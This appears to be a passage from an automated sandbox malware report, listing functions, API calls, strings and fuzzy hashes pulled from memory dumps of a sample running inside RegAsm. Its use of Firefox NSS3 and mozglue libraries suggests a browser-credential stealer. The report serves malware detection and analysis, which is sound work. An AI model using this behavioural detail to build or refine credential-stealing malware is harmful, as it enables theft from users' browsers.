                                                                                      • Part of subcall function 6CDA6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CD51C6F,00000000,00000004,?,?), ref: 6CDA6C3F
                                                                                    • PR_GetCurrentThread.NSS3 ref: 6CDBCD54
                                                                                      • Part of subcall function 6CE19BF0: TlsGetValue.KERNEL32(?,?,?,6CE60A75), ref: 6CE19C07
                                                                                      • Part of subcall function 6CDA7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CD51CCC,00000000,00000000,?,?), ref: 6CDA729F
                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CDBCD9B
                                                                                    • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CDBCE0B
                                                                                    • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CDBCE2C
                                                                                      • Part of subcall function 6CDB10C0: TlsGetValue.KERNEL32(?,6CD58802,00000000,00000008,?,6CD4EF74,00000000), ref: 6CDB10F3
                                                                                      • Part of subcall function 6CDB10C0: EnterCriticalSection.KERNEL32(?,?,6CD58802,00000000,00000008,?,6CD4EF74,00000000), ref: 6CDB110C
                                                                                      • Part of subcall function 6CDB10C0: PL_ArenaAllocate.NSS3(?,?,?,6CD58802,00000000,00000008,?,6CD4EF74,00000000), ref: 6CDB1141
                                                                                      • Part of subcall function 6CDB10C0: PR_Unlock.NSS3(?,?,?,6CD58802,00000000,00000008,?,6CD4EF74,00000000), ref: 6CDB1182
                                                                                      • Part of subcall function 6CDB10C0: TlsGetValue.KERNEL32(?,6CD58802,00000000,00000008,?,6CD4EF74,00000000), ref: 6CDB119C
                                                                                    • PORT_ArenaMark_Util.NSS3(00000000), ref: 6CDBCE40
                                                                                      • Part of subcall function 6CDB14C0: TlsGetValue.KERNEL32 ref: 6CDB14E0
                                                                                      • Part of subcall function 6CDB14C0: EnterCriticalSection.KERNEL32 ref: 6CDB14F5
                                                                                      • Part of subcall function 6CDB14C0: PR_Unlock.NSS3 ref: 6CDB150D
                                                                                      • Part of subcall function 6CDBCEE0: PORT_ArenaMark_Util.NSS3(?,6CDBCD93,?), ref: 6CDBCEEE
                                                                                      • Part of subcall function 6CDBCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CDBCD93,?), ref: 6CDBCEFC
                                                                                      • Part of subcall function 6CDBCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CDBCD93,?), ref: 6CDBCF0B
                                                                                      • Part of subcall function 6CDBCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CDBCD93,?), ref: 6CDBCF1D
                                                                                      • Part of subcall function 6CDBCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CDBCD93,?), ref: 6CDBCF47
                                                                                      • Part of subcall function 6CDBCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CDBCD93,?), ref: 6CDBCF67
                                                                                      • Part of subcall function 6CDBCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CDBCD93,?,?,?,?,?,?,?,?,?,?,?,6CDBCD93,?), ref: 6CDBCF78
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                    • String ID:
                                                                                    • API String ID: 3748922049-0
                                                                                    • Opcode ID: b95a14950a9f094994b7a8dcabe8ee6b24cd0413b1b28d40f305e23c51d3d49c
                                                                                    • Instruction ID: d09e5b196be59db1ad86a8db5f32c604c35291aebc3cb37bef7493526841d4e6
                                                                                    • Opcode Fuzzy Hash: b95a14950a9f094994b7a8dcabe8ee6b24cd0413b1b28d40f305e23c51d3d49c
                                                                                    • Instruction Fuzzy Hash: 065180F6A00105DBE710DF69DC40BAA77F4BF88348F250524E956A7B60EB31E915CBA1
                                                                                    Function 6CC89F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC89FDB
                                                                                    • free.MOZGLUE(?,?), ref: 6CC89FF0
                                                                                    • free.MOZGLUE(?,?), ref: 6CC8A006
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC8A0BE
                                                                                    • free.MOZGLUE(?,?), ref: 6CC8A0D5
                                                                                    • free.MOZGLUE(?,?), ref: 6CC8A0EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                    • String ID:
                                                                                    • API String ID: 956590011-0
                                                                                    • Opcode ID: 8df95bf3468f4dcb70a5b93bb41ba8a01abbb89e792dcfe39741a4f872a2951c
                                                                                    • Instruction ID: 9c19301ef556c554c1055d4111ec05caa02896369e989cbeecb3336dbf044415
                                                                                    • Opcode Fuzzy Hash: 8df95bf3468f4dcb70a5b93bb41ba8a01abbb89e792dcfe39741a4f872a2951c
                                                                                    • Instruction Fuzzy Hash: C261A0759096019FC711CF18C48055AB7F5FFC8328F548669E89A9B702EB32E996CBC1
                                                                                    Function 6CC8DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8DC60
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,6CC8D38A,?), ref: 6CC8DC6F
                                                                                    • free.MOZGLUE(?,?,?,?,?,6CC8D38A,?), ref: 6CC8DCC1
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CC8D38A,?), ref: 6CC8DCE9
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CC8D38A,?), ref: 6CC8DD05
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CC8D38A,?), ref: 6CC8DD4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 1842996449-0
                                                                                    • Opcode ID: 302164b4bdc4204a8f5fbefc04d345935966b577cbc528d8b63c052ead2e8c54
                                                                                    • Instruction ID: f95ab5b4610a31dd541f95dcbf7d8d8831b510fef9ec918727a68d02dc9b95bd
                                                                                    • Opcode Fuzzy Hash: 302164b4bdc4204a8f5fbefc04d345935966b577cbc528d8b63c052ead2e8c54
                                                                                    • Instruction Fuzzy Hash: 01416DB5A01606CFCB40CF99C88099BBBF5FF89318B65456AE945A7B11E771FC10CB90
                                                                                    Function 0041ABF7 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __lock.LIBCMT ref: 0041AC05
                                                                                      • Part of subcall function 004195E3: __mtinitlocknum.LIBCMT ref: 004195F9
                                                                                      • Part of subcall function 004195E3: __amsg_exit.LIBCMT ref: 00419605
                                                                                      • Part of subcall function 004195E3: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142,?,?,0041824B,00000000,0042C9A0,00418292,?), ref: 0041960D
                                                                                    • DecodePointer.KERNEL32(0042C928,00000020,0041AD48,00000000,00000001,00000000,?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D), ref: 0041AC41
                                                                                    • DecodePointer.KERNEL32(?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC52
                                                                                      • Part of subcall function 0041A1CA: EncodePointer.KERNEL32(00000000,0041DD9C,00640400,00000314,00000000,?,?,?,?,?,0041AF5F,00640400,Microsoft Visual C++ Runtime Library,00012010), ref: 0041A1CC
                                                                                    • DecodePointer.KERNEL32(-00000004,?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC78
                                                                                    • DecodePointer.KERNEL32(?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC8B
                                                                                    • DecodePointer.KERNEL32(?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                    • String ID:
                                                                                    • API String ID: 2005412495-0
                                                                                    • Opcode ID: 5eae9ba92db9f391da7a98d96cbf24dd8e8b58c23c54e94460fead475b42f367
                                                                                    • Instruction ID: 82b28b59af7dd3c184eeb9877d32a4703ccad0faabb5854936e7eb60fed2b48d
                                                                                    • Opcode Fuzzy Hash: 5eae9ba92db9f391da7a98d96cbf24dd8e8b58c23c54e94460fead475b42f367
                                                                                    • Instruction Fuzzy Hash: 2A31597090131ADFDF009FA9D9446EDBAB2BB08314F10402BE510A6251EBBC48E1DF9A
                                                                                    Function 6CC76590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC6FA80: GetCurrentThreadId.KERNEL32 ref: 6CC6FA8D
                                                                                      • Part of subcall function 6CC6FA80: AcquireSRWLockExclusive.KERNEL32(6CCBF448), ref: 6CC6FA99
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC76727
                                                                                    • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CC767C8
                                                                                      • Part of subcall function 6CC84290: memcpy.VCRUNTIME140(?,?,6CC92003,6CC90AD9,?,6CC90AD9,00000000,?,6CC90AD9,?,00000004,?,6CC91A62,?,6CC92003,?), ref: 6CC842C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                    • String ID: data
                                                                                    • API String ID: 511789754-2918445923
                                                                                    • Opcode ID: 868b79dfd72263b26f106d93265602dabf269a79dfc1c2bf0422cd05cb11deb2
                                                                                    • Instruction ID: 4c7fee14074932d8afbb4927f9e725613be66797e8b279bba5f0a1475bae2ffc
                                                                                    • Opcode Fuzzy Hash: 868b79dfd72263b26f106d93265602dabf269a79dfc1c2bf0422cd05cb11deb2
                                                                                    • Instruction Fuzzy Hash: F2D1BD75A087408FD724CF65C851B9BBBE5EFC5348F10892DE48997B91FB30A849CB62
                                                                                    Function 6CC8C810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CC8C82D
                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CC8C842
                                                                                      • Part of subcall function 6CC8CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6CCAB5EB,00000000), ref: 6CC8CB12
                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6CC8C863
                                                                                    • std::_Facet_Register.LIBCPMT ref: 6CC8C875
                                                                                      • Part of subcall function 6CC6B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6CCAB636,?), ref: 6CC6B143
                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CC8C89A
                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC8C8BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                                    • String ID:
                                                                                    • API String ID: 2745304114-0
                                                                                    • Opcode ID: ad86ec264a5a47fda1b31331219832c27f8e8dad6352cba228b64b06a68c3f5c
                                                                                    • Instruction ID: d6efabef8bd65adb6721dbe20feece3e57f601e32d838ee83afd082c42a582f2
                                                                                    • Opcode Fuzzy Hash: ad86ec264a5a47fda1b31331219832c27f8e8dad6352cba228b64b06a68c3f5c
                                                                                    • Instruction Fuzzy Hash: E911B275B002099FCB00DFF5D9D98AFBB78EF89358B000169E60697341EB34A909CBA5
                                                                                    Function 004199D0 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 004199DC
                                                                                      • Part of subcall function 0041A334: __getptd_noexit.LIBCMT ref: 0041A337
                                                                                      • Part of subcall function 0041A334: __amsg_exit.LIBCMT ref: 0041A344
                                                                                    • __amsg_exit.LIBCMT ref: 004199FC
                                                                                    • __lock.LIBCMT ref: 00419A0C
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00419A29
                                                                                    • _free.LIBCMT ref: 00419A3C
                                                                                    • InterlockedIncrement.KERNEL32(0042E1C0), ref: 00419A54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                    • String ID:
                                                                                    • API String ID: 3470314060-0
                                                                                    • Opcode ID: b773e6d552ccfad440dbe85945124e7c8c2f4aeb4d937a5b8b473a23aea6016f
                                                                                    • Instruction ID: caf00a63a47d2107667ce069341bde755350c13116bb31bb8cabb81d752e3d13
                                                                                    • Opcode Fuzzy Hash: b773e6d552ccfad440dbe85945124e7c8c2f4aeb4d937a5b8b473a23aea6016f
                                                                                    • Instruction Fuzzy Hash: 4301A131A01652BBDB21AB6694297DE7760AF00764F48411BF800A7691D73C5DC6CBDD
                                                                                    Function 00410EB9 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • StrStrA.SHLWAPI(?,00000104,00000001,00000000,?,00411A64,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EC5
                                                                                    • lstrcpyn.KERNEL32(C:\Users\user\Desktop\,?,00000000,00000104,?,00411A64,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EDE
                                                                                    • lstrlenA.KERNEL32(00000104,?,00411A64,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EF0
                                                                                    • wsprintfA.USER32 ref: 00410F02
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpynlstrlenwsprintf
                                                                                    • String ID: %s%s$C:\Users\user\Desktop\
                                                                                    • API String ID: 1206339513-93594680
                                                                                    • Opcode ID: b1cf3b79bae8205c5e98a6104eb4aec33707c09f6793000b5dfa10ead055c7da
                                                                                    • Instruction ID: ce7f7404f388939de60972bac1840d25f072318a1a03b2d91798bb9a882066e1
                                                                                    • Opcode Fuzzy Hash: b1cf3b79bae8205c5e98a6104eb4aec33707c09f6793000b5dfa10ead055c7da
                                                                                    • Instruction Fuzzy Hash: F7F089326002297FDB011F59AC48E9BBFAEEF5A765F044036FD0893211C7725D118BE5
                                                                                    Function 6CC6D5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CC3EB57,?,?,?,?,?,?,?,?,?), ref: 6CC6D652
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CC3EB57,?), ref: 6CC6D660
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CC3EB57,?), ref: 6CC6D673
                                                                                    • free.MOZGLUE(?), ref: 6CC6D888
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$memsetmoz_xmalloc
                                                                                    • String ID: |Enabled
                                                                                    • API String ID: 4142949111-2633303760
                                                                                    • Opcode ID: 5769ecde866987215c214312e5b3e8740b2931b25560c7db08aaaf9a0546d1f5
                                                                                    • Instruction ID: d2b9d6e82247c08b8cd15cf5a8286e2bed2ad11bdee209f9620e142a0e38bca8
                                                                                    • Opcode Fuzzy Hash: 5769ecde866987215c214312e5b3e8740b2931b25560c7db08aaaf9a0546d1f5
                                                                                    • Instruction Fuzzy Hash: F8A118B4A003158FDB11CF6AC5D07AEBBF1AF49318F24845CD889ABB41E735E945CBA1
                                                                                    Function 004063B1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004063B6
                                                                                    • memcmp.MSVCRT ref: 004063DC
                                                                                    • memset.MSVCRT ref: 0040640B
                                                                                    • LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$AllocH_prologLocallstrlenmemcmpmemset
                                                                                    • String ID: v10
                                                                                    • API String ID: 2733184300-1337588462
                                                                                    • Opcode ID: b3dbac36ee52dd66e9498f1f3aa10f75fd351b9d8fe0f59f2cbfbbe816d508af
                                                                                    • Instruction ID: 826216ebd120f836410502ef39e66991b541041ee5f5c3879761d56bb48995ad
                                                                                    • Opcode Fuzzy Hash: b3dbac36ee52dd66e9498f1f3aa10f75fd351b9d8fe0f59f2cbfbbe816d508af
                                                                                    • Instruction Fuzzy Hash: 39314D71D00219ABCB10DF95DC82AEEBB78EF04354F11813FE916B62C0D7B89A19CA58
                                                                                    Function 6CC6F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CC6F480
                                                                                      • Part of subcall function 6CC3F100: LoadLibraryW.KERNEL32(shell32,?,6CCAD020), ref: 6CC3F122
                                                                                      • Part of subcall function 6CC3F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC3F132
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6CC6F555
